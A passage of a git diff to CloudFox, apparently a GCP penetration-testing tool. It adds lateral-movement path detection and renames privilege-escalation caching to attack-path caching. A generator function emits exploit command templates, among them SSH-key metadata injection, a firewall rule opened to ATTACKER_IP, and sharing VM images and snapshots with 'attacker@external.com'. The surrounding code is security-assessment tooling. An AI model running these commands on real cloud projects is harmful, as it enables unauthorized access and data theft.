PermissionBasedLateralPath represents a lateral movement capability based on IAM permissions +type PermissionBasedLateralPath struct { + Principal string // Who has this capability + PrincipalType string // user, serviceAccount, group + ProjectID string // Project where permission exists + Permission string // The dangerous permission + Category string // Category of lateral movement + RiskLevel string // CRITICAL, HIGH, MEDIUM + Description string // What this enables + ExploitCommand string // Command to exploit +} + // ------------------------------ // Module Struct // ------------------------------ type LateralMovementModule struct { gcpinternal.BaseGCPModule - ProjectImpersonationChains map[string][]ImpersonationChain // projectID -> chains - ProjectTokenTheftVectors map[string][]TokenTheftVector // projectID -> vectors - LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - mu sync.Mutex + ProjectImpersonationChains map[string][]ImpersonationChain // projectID -> chains + ProjectTokenTheftVectors map[string][]TokenTheftVector // projectID -> vectors + ProjectPermissionBasedPaths map[string][]PermissionBasedLateralPath // projectID -> permission-based paths + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -96,10 +110,11 @@ func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { } module := &LateralMovementModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ProjectImpersonationChains: make(map[string][]ImpersonationChain), - ProjectTokenTheftVectors: make(map[string][]TokenTheftVector), - LootMap: make(map[string]map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectImpersonationChains: make(map[string][]ImpersonationChain), + ProjectTokenTheftVectors: make(map[string][]TokenTheftVector), + ProjectPermissionBasedPaths: make(map[string][]PermissionBasedLateralPath), + LootMap: make(map[string]map[string]*internal.LootFile), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -124,28 +139,105 @@ func (m *LateralMovementModule) getAllTokenTheftVectors() []TokenTheftVector { return all } +func (m *LateralMovementModule) getAllPermissionBasedPaths() []PermissionBasedLateralPath { + var all []PermissionBasedLateralPath + for _, paths := range m.ProjectPermissionBasedPaths { + all = append(all, paths...) + } + return all +} + func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + // Analyze org and folder level lateral movement paths (runs once for all projects) + m.analyzeOrgFolderLateralPaths(ctx, logger) + // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) allChains := m.getAllImpersonationChains() allVectors := m.getAllTokenTheftVectors() + allPermBasedPaths := m.getAllPermissionBasedPaths() // Check results - totalPaths := len(allChains) + len(allVectors) + totalPaths := len(allChains) + len(allVectors) + len(allPermBasedPaths) if totalPaths == 0 { logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors", - totalPaths, len(allChains), len(allVectors)), GCP_LATERALMOVEMENT_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors, %d permission-based", + totalPaths, len(allChains), len(allVectors), len(allPermBasedPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) m.writeOutput(ctx, logger) } +// analyzeOrgFolderLateralPaths analyzes organization and folder level IAM for lateral movement permissions +func (m *LateralMovementModule) analyzeOrgFolderLateralPaths(ctx context.Context, logger internal.Logger) { + attackSvc := attackpathservice.New() + + // Analyze organization-level IAM + orgPaths, orgNames, _, err := attackSvc.AnalyzeOrganizationAttackPaths(ctx, "lateral") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, "Could not analyze organization-level lateral movement paths") + } + } else if len(orgPaths) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level lateral movement path(s)", len(orgPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + for _, path := range orgPaths { + orgName := orgNames[path.ScopeID] + if orgName == "" { + orgName = path.ScopeID + } + lateralPath := PermissionBasedLateralPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: "org:" + path.ScopeID, + Permission: path.Method, + Category: path.Category + " (Org: " + orgName + ")", + RiskLevel: "CRITICAL", // Org-level is critical + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + // Store under a special "organization" key + m.mu.Lock() + m.ProjectPermissionBasedPaths["organization"] = append(m.ProjectPermissionBasedPaths["organization"], lateralPath) + m.mu.Unlock() + } + } + + // Analyze folder-level IAM + folderPaths, folderNames, err := attackSvc.AnalyzeFolderAttackPaths(ctx, "lateral") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, "Could not analyze folder-level lateral movement paths") + } + } else if len(folderPaths) > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level lateral movement path(s)", len(folderPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + for _, path := range folderPaths { + folderName := folderNames[path.ScopeID] + if folderName == "" { + folderName = path.ScopeID + } + lateralPath := PermissionBasedLateralPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: "folder:" + path.ScopeID, + Permission: path.Method, + Category: path.Category + " (Folder: " + folderName + ")", + RiskLevel: "CRITICAL", // Folder-level is critical + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + // Store under a special "folder" key + m.mu.Lock() + m.ProjectPermissionBasedPaths["folder"] = append(m.ProjectPermissionBasedPaths["folder"], lateralPath) + m.mu.Unlock() + } + } +} + // ------------------------------ // Project Processor // ------------------------------ @@ -177,6 +269,9 @@ func (m *LateralMovementModule) processProject(ctx context.Context, projectID st // 2. Find token theft vectors (compute instances, functions, etc.) m.findTokenTheftVectors(ctx, projectID, logger) + + // 3. Find permission-based lateral movement paths + m.findPermissionBasedLateralPaths(ctx, projectID, logger) } // findImpersonationChains finds service account impersonation paths @@ -601,6 +696,131 @@ gcloud container clusters get-credentials %s --location=%s --project=%s } } +// findPermissionBasedLateralPaths identifies principals with lateral movement permissions +// This now uses the centralized attackpathService for project and resource-level analysis +func (m *LateralMovementModule) findPermissionBasedLateralPaths(ctx context.Context, projectID string, logger internal.Logger) { + // Use attackpathService for project-level analysis + attackSvc := attackpathservice.New() + + projectName := m.GetProjectName(projectID) + paths, err := attackSvc.AnalyzeProjectAttackPaths(ctx, projectID, projectName, "lateral") + if err != nil { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not analyze lateral movement permissions for project %s", projectID)) + return + } + + // Convert AttackPath to PermissionBasedLateralPath + for _, path := range paths { + lateralPath := PermissionBasedLateralPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: projectID, + Permission: path.Method, + Category: path.Category, + RiskLevel: "HIGH", // Default risk level + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + + m.mu.Lock() + m.ProjectPermissionBasedPaths[projectID] = append(m.ProjectPermissionBasedPaths[projectID], lateralPath) + m.mu.Unlock() + } + + // Also analyze resource-level IAM + resourcePaths, err := attackSvc.AnalyzeResourceAttackPaths(ctx, projectID, "lateral") + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not analyze resource-level lateral movement permissions for project %s", projectID)) + } + } else { + for _, path := range resourcePaths { + lateralPath := PermissionBasedLateralPath{ + Principal: path.Principal, + PrincipalType: path.PrincipalType, + ProjectID: projectID, + Permission: path.Method, + Category: path.Category + " (Resource: " + path.ScopeName + ")", + RiskLevel: "HIGH", + Description: path.Description, + ExploitCommand: path.ExploitCommand, + } + + m.mu.Lock() + m.ProjectPermissionBasedPaths[projectID] = append(m.ProjectPermissionBasedPaths[projectID], lateralPath) + m.mu.Unlock() + } + } +} + +// generateLateralExploitCommand generates an exploit command for a lateral movement permission +func (m *LateralMovementModule) generateLateralExploitCommand(permission, projectID string) string { + switch permission { + case "compute.networks.addPeering": + return fmt.Sprintf(`# Create VPC peering to another project's network +gcloud compute networks peerings create lateral-peering \ + --network=NETWORK_NAME \ + --peer-network=projects/TARGET_PROJECT/global/networks/TARGET_NETWORK \ + --project=%s`, projectID) + case "compute.instances.osLogin": + return fmt.Sprintf(`# SSH into instance via OS Login +gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s`, projectID) + case "compute.instances.osAdminLogin": + return fmt.Sprintf(`# SSH into instance with sudo via OS Login +gcloud compute ssh INSTANCE_NAME --zone=ZONE --project=%s +# Then: sudo su`, projectID) + case "compute.instances.setMetadata": + return fmt.Sprintf(`# Add SSH key to instance metadata +gcloud compute instances add-metadata INSTANCE_NAME --zone=ZONE \ + --metadata=ssh-keys="username:$(cat ~/.ssh/id_rsa.pub)" --project=%s`, projectID) + case "compute.projects.setCommonInstanceMetadata": + return fmt.Sprintf(`# Add SSH key to project-wide metadata (affects all instances) +gcloud compute project-info add-metadata \ + --metadata=ssh-keys="username:$(cat ~/.ssh/id_rsa.pub)" --project=%s`, projectID) + case "container.clusters.getCredentials": + return fmt.Sprintf(`# Get GKE cluster credentials +gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s`, projectID) + case "container.pods.exec": + return fmt.Sprintf(`# Execute commands in a pod +kubectl exec -it POD_NAME -- /bin/sh`, projectID) + case "compute.firewalls.create": + return fmt.Sprintf(`# Create firewall rule to allow access +gcloud compute firewall-rules create allow-lateral \ + --network=NETWORK_NAME --allow=tcp:22,tcp:3389 \ + --source-ranges=ATTACKER_IP/32 --project=%s`, projectID) + case "cloudsql.instances.connect": + return fmt.Sprintf(`# Connect to Cloud SQL instance +gcloud sql connect INSTANCE_NAME --user=USER --project=%s`, projectID) + case "iap.tunnelInstances.accessViaIAP": + return fmt.Sprintf(`# Access instance via IAP tunnel +gcloud compute start-iap-tunnel INSTANCE_NAME PORT --zone=ZONE --project=%s`, projectID) + case "compute.images.setIamPolicy": + return fmt.Sprintf(`# Share VM image with external project +gcloud compute images add-iam-policy-binding IMAGE_NAME \ + --member='user:attacker@external.com' --role='roles/compute.imageUser' --project=%s`, projectID) + case "compute.snapshots.setIamPolicy": + return fmt.Sprintf(`# Share snapshot with external project +gcloud compute snapshots add-iam-policy-binding SNAPSHOT_NAME \ + --member='user:attacker@external.com' --role='roles/compute.storageAdmin' --project=%s`, projectID) + default: + return fmt.Sprintf("# Permission: %s\n# Refer to GCP documentation for exploitation", permission) + } +} + +// extractLateralPrincipalType extracts the type from a principal name +func extractLateralPrincipalType(principalName string) string { + if strings.HasPrefix(principalName, "user:") { + return "user" + } else if strings.HasPrefix(principalName, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(principalName, "group:") { + return "group" + } + return "unknown" +} + // ------------------------------ // Loot File Management // ------------------------------ diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index c401314a..1d01dd78 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -33,7 +33,7 @@ type NotebooksModule struct { ProjectInstances map[string][]notebooksservice.NotebookInstanceInfo // projectID -> instances ProjectRuntimes map[string][]notebooksservice.RuntimeInfo // projectID -> runtimes LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -61,8 +61,8 @@ func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { } func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) @@ -196,7 +196,7 @@ func (m *NotebooksModule) getInstancesHeader() []string { "State", "Machine Type", "Service Account", - "Priv Esc", + "Attack Paths", "Network", "Subnet", "Public IP", @@ -217,7 +217,7 @@ func (m *NotebooksModule) getRuntimesHeader() []string { "Type", "Machine Type", "Service Account", - "Priv Esc", + "Attack Paths", "Network", "Subnet", } @@ -235,13 +235,13 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note sa = "(default)" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "(default)" && sa != "" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -269,7 +269,7 @@ func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.Note instance.State, instance.MachineType, sa, - privEsc, + attackPaths, network, subnet, boolToYesNo(!instance.NoPublicIP), @@ -290,13 +290,13 @@ func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.Runtim sa = "-" } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "-" && sa != "" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -317,7 +317,7 @@ func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.Runtim runtime.RuntimeType, runtime.MachineType, sa, - privEsc, + attackPaths, network, subnet, }) diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 1b52908f..6d4edacb 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -6,7 +6,7 @@ import ( "strings" "sync" - privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" + attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -19,26 +19,54 @@ var GCPPrivescCommand = &cobra.Command{ Short: "Identify privilege escalation paths in GCP organizations, folders, and projects", Long: `Analyze GCP IAM policies to identify privilege escalation opportunities. -This module examines IAM bindings at organization, folder, and project levels +This module examines IAM bindings at organization, folder, project, and resource levels to find principals with dangerous permissions that could be used to escalate privileges within the GCP environment. -Detected privilege escalation methods include: -- Service Account Token Creation (iam.serviceAccounts.getAccessToken) -- Service Account Key Creation (iam.serviceAccountKeys.create) -- Service Account Implicit Delegation -- Service Account SignBlob/SignJwt +Detected privilege escalation methods (60+) include: + +Service Account Abuse: +- Token Creation (getAccessToken, getOpenIdToken) +- Key Creation (serviceAccountKeys.create, hmacKeys.create) +- Implicit Delegation, SignBlob, SignJwt +- Workload Identity Federation (external identity impersonation) + +IAM Policy Modification: - Project/Folder/Org IAM Policy Modification -- Custom Role Modification (iam.roles.update) +- Service Account IAM Policy + SA Creation combo +- Custom Role Create/Update (iam.roles.create/update) - Org Policy Modification (orgpolicy.policy.set) +- Resource-specific IAM (Pub/Sub, BigQuery, Artifact Registry, Compute, KMS, Source Repos) + +Compute & Serverless: - Compute Instance Metadata Injection (SSH keys, startup scripts) - Create GCE Instance with privileged SA -- Cloud Functions/Run Deployment with SA Identity +- Cloud Functions Create/Update with SA Identity +- Cloud Run Services/Jobs Create/Update with SA Identity +- App Engine Deploy with SA Identity - Cloud Build SA Abuse + +AI/ML: +- Vertex AI Custom Jobs with SA +- Vertex AI Notebooks with SA +- AI Platform Jobs with SA + +Data Processing & Orchestration: +- Dataproc Cluster Create / Job Submit +- Cloud Composer Environment Create/Update +- Dataflow Job Create +- Cloud Workflows with SA +- Eventarc Triggers with SA + +Scheduling & Tasks: - Cloud Scheduler HTTP Request with SA +- Cloud Tasks with SA + +Other: - Deployment Manager Deployment -- GKE Cluster Access +- GKE Cluster Access, Pod Exec, Secrets - Secret Manager Access +- KMS Key Access / Decrypt - API Key Creation/Listing`, Run: runGCPPrivescCommand, } @@ -47,10 +75,11 @@ type PrivescModule struct { gcpinternal.BaseGCPModule // All paths from combined analysis - AllPaths []privescservice.PrivescPath - OrgPaths []privescservice.PrivescPath - FolderPaths []privescservice.PrivescPath - ProjectPaths map[string][]privescservice.PrivescPath // projectID -> paths + AllPaths []attackpathservice.AttackPath + OrgPaths []attackpathservice.AttackPath + FolderPaths []attackpathservice.AttackPath + ProjectPaths map[string][]attackpathservice.AttackPath // projectID -> paths + ResourcePaths []attackpathservice.AttackPath // Org/folder info OrgIDs []string @@ -78,10 +107,11 @@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { module := &PrivescModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - AllPaths: []privescservice.PrivescPath{}, - OrgPaths: []privescservice.PrivescPath{}, - FolderPaths: []privescservice.PrivescPath{}, - ProjectPaths: make(map[string][]privescservice.PrivescPath), + AllPaths: []attackpathservice.AttackPath{}, + OrgPaths: []attackpathservice.AttackPath{}, + FolderPaths: []attackpathservice.AttackPath{}, + ProjectPaths: make(map[string][]attackpathservice.AttackPath), + ResourcePaths: []attackpathservice.AttackPath{}, OrgIDs: []string{}, OrgNames: make(map[string]string), FolderNames: make(map[string]string), @@ -91,11 +121,11 @@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { } func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Analyzing privilege escalation paths across organizations, folders, and projects...", globals.GCP_PRIVESC_MODULE_NAME) + logger.InfoM("Analyzing privilege escalation paths across organizations, folders, projects, and resources...", globals.GCP_PRIVESC_MODULE_NAME) - // Use combined analysis to get all privesc paths at once - svc := privescservice.New() - result, err := svc.CombinedPrivescAnalysis(ctx, m.ProjectIDs, m.ProjectNames) + // Use attackpathService with "privesc" path type + svc := attackpathservice.New() + result, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, m.ProjectNames, "privesc") if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, "Failed to analyze privilege escalation") @@ -106,6 +136,7 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { m.AllPaths = result.AllPaths m.OrgPaths = result.OrgPaths m.FolderPaths = result.FolderPaths + m.ResourcePaths = result.ResourcePaths m.OrgIDs = result.OrgIDs m.OrgNames = result.OrgNames m.FolderNames = result.FolderNames @@ -129,9 +160,10 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { orgCount := len(m.OrgPaths) folderCount := len(m.FolderPaths) projectCount := len(result.ProjectPaths) + resourceCount := len(m.ResourcePaths) - logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s): %d org-level, %d folder-level, %d project-level", - len(m.AllPaths), orgCount, folderCount, projectCount), globals.GCP_PRIVESC_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d privilege escalation path(s): %d org-level, %d folder-level, %d project-level, %d resource-level", + len(m.AllPaths), orgCount, folderCount, projectCount, resourceCount), globals.GCP_PRIVESC_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -147,7 +179,7 @@ func (m *PrivescModule) generateLoot() { } } -func (m *PrivescModule) addPathToLoot(path privescservice.PrivescPath) { +func (m *PrivescModule) addPathToLoot(path attackpathservice.AttackPath) { lootFile := m.LootMap["privesc-exploit-commands"] if lootFile == nil { return @@ -195,7 +227,7 @@ func (m *PrivescModule) getHeader() []string { } } -func (m *PrivescModule) pathsToTableBody(paths []privescservice.PrivescPath) [][]string { +func (m *PrivescModule) pathsToTableBody(paths []attackpathservice.AttackPath) [][]string { var body [][]string for _, path := range paths { scopeName := path.ScopeName diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 7dda06bf..004c42f7 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -49,7 +49,7 @@ type SchedulerModule struct { ProjectJobs map[string][]SchedulerService.JobInfo // projectID -> jobs LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -86,8 +86,8 @@ func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) @@ -246,7 +246,7 @@ func (m *SchedulerModule) getTableHeader() []string { "Target Type", "Target", "Service Account", - "Priv Esc", + "Attack Paths", "Last Run", } } @@ -264,13 +264,13 @@ func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]s sa = job.ServiceAccount } - // Check privesc for the service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if sa != "-" { - privEsc = m.PrivescCache.GetPrivescSummary(sa) + attackPaths = m.AttackPathCache.GetAttackSummary(sa) } else { - privEsc = "No" + attackPaths = "No" } } @@ -293,7 +293,7 @@ func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]s job.TargetType, target, sa, - privEsc, + attackPaths, lastRun, }) } diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 255111e0..717cf169 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -57,7 +57,7 @@ type ServiceAccountsModule struct { // Module-specific fields - per-project for hierarchical output ProjectServiceAccounts map[string][]ServiceAccountAnalysis // projectID -> service accounts LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results mu sync.Mutex } @@ -97,8 +97,8 @@ func runGCPServiceAccountsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get privesc cache from context (populated by --with-privesc flag or all-checks) - m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, m.processProject) @@ -386,7 +386,7 @@ func (m *ServiceAccountsModule) getTableHeader() []string { "Project Name", "Project ID", "Email", - "Priv Esc", + "Attack Paths", "Display Name", "Disabled", "Default SA", @@ -417,10 +417,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser dwd = "Yes" } - // Check privesc for this service account - privEsc := "-" - if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { - privEsc = m.PrivescCache.GetPrivescSummary(sa.Email) + // Check attack paths (privesc/exfil/lateral) for this service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) } // Count user-managed keys @@ -443,7 +443,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "TokenCreator", member, }) } @@ -453,7 +453,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "KeyAdmin", member, }) } @@ -463,7 +463,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "ActAs", member, }) } @@ -473,7 +473,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "SAAdmin", member, }) } @@ -483,7 +483,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "SignBlob", member, }) } @@ -493,7 +493,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "SignJwt", member, }) } @@ -502,7 +502,7 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if !hasBindings { body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, privEsc, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.Email, attackPaths, sa.DisplayName, disabled, defaultSA, dwd, keyCount, "-", "-", }) } diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index 90543e28..2e8daccf 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -6,9 +6,9 @@ import ( "strings" "sync" + attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" - privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -38,6 +38,8 @@ Default output: With --extended flag (adds): - Service accounts that can be impersonated - Privilege escalation opportunities +- Data exfiltration capabilities (compute exports, logging sinks, database exports, etc.) +- Lateral movement capabilities (VPC peering, OS Login, firewall modifications, etc.) - Exploitation commands With --groups flag: @@ -129,21 +131,41 @@ type PrivilegeEscalationPath struct { RequiredPerms string // Specific permissions needed for this path } +// DataExfilCapability represents a data exfiltration capability for the current identity +type DataExfilCapability struct { + ProjectID string + Permission string + Category string + RiskLevel string + Description string +} + +// LateralMoveCapability represents a lateral movement capability for the current identity +type LateralMoveCapability struct { + ProjectID string + Permission string + Category string + RiskLevel string + Description string +} + // ------------------------------ // Module Struct // ------------------------------ type WhoAmIModule struct { gcpinternal.BaseGCPModule - Identity IdentityContext - RoleBindings []RoleBinding - ImpersonationTargets []ImpersonationTarget - PrivEscPaths []PrivilegeEscalationPath - DangerousPermissions []string - LootMap map[string]*internal.LootFile - Extended bool - ProvidedGroups []string // Groups provided via --groups flag - mu sync.Mutex + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DataExfilCapabilities []DataExfilCapability + LateralMoveCapabilities []LateralMoveCapability + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + ProvidedGroups []string // Groups provided via --groups flag + mu sync.Mutex } // ------------------------------ @@ -243,9 +265,15 @@ func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { // Step 5: Identify privilege escalation paths m.identifyPrivEscPaths(ctx, logger) + + // Step 6: Identify data exfiltration capabilities + m.identifyDataExfilCapabilities(ctx, logger) + + // Step 7: Identify lateral movement capabilities + m.identifyLateralMoveCapabilities(ctx, logger) } - // Step 6: Generate loot + // Step 8: Generate loot m.generateLoot() // Write output @@ -680,7 +708,7 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte } // identifyPrivEscPaths identifies privilege escalation paths based on current permissions -// Uses privescService for comprehensive analysis consistent with the privesc module +// Uses attackpathService for comprehensive analysis consistent with the privesc module // Filters results to only show paths relevant to the current identity and their groups // Will use cached privesc data from context if available (e.g., from all-checks run) func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { @@ -778,10 +806,10 @@ 